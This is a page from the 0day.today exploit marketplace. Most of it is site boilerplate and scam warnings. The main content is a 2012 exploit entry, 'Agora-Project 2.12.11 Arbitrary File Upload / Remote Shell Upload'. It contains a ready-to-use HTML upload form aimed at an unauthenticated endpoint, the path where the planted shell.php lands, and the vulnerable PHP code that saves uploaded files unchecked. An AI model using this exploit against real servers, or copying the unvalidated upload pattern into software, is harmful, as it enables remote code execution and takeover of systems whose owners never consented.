0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Agora-Project 2.12.11 Arbitrary File Upload Vulnerability
# Exploit Title: agora-project_2.12.11_12-2011 Remote Shell Upload # Google Dork: n0 N0obs # Date: 10/06/2012 # Exploit Author: Misa3l # Vendor Homepage: http://sourceforge.net/projects/agora-project/ # Software Link: http://sourceforge.net/projects/agora-project/files/latest/download # Version: 2.12.11_12-2011 # Tested on: Debian 6.0 Description Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc. Exploit ********************************************************************************** <form action="http://127.0.0.1/labs/module_fichier/upload/upload_filemanager.php?dossierup=testing" ENCTYPE="multipart/form-data" method="post"> <input type="file" name="dossierup" /> <input type="submit" name="sube" /> </form> ********************************************************************************** Dir Shell: http://127.0.0.1/labs/stock_fichiers/tmp/ "testing" <--- folder "shell.php" <--- shell File Vul: module_fichier/upload/upload_filemanager.php <?php //// INIT define("ROOT_PATH","../../"); require_once ROOT_PATH."includes/global.inc.php"; //// AJOUTE LES FICHIERS UPLOADES AVEC PLUPLOAD DANS UN DOSSIER TEMPORAIRE //// if(@$_GET["dossierup"]!="" && isset($_FILES) && count($_FILES)>0) { //// DOSSIER TEMPORAIRE (Cr�� si inexistant + chmod (car s'il est pass� dans mkdir() �a marche pas!)) $save_path = PATH_TMP.$_GET["dossierup"]; if(is_dir($save_path)==false) { mkdir($save_path); chmod($save_path, 0775); } //// PLACE LE/LES FICHIERS foreach($_FILES as $file_tmp) { if($file_tmp["error"]==0 && is_writable($save_path)) { move_uploaded_file($file_tmp["tmp_name"], $save_path."/".$file_tmp["name"]); } elseif($num_erreur==4) { echo "UPLOAD_ERR_NO_FILE"; } else { echo $trad["MSG_ALERTE_taille_fichier"]; } } } ?> *************************************************************************************** End... Misa3l From Venezuela # 0day.today [2024-11-16] #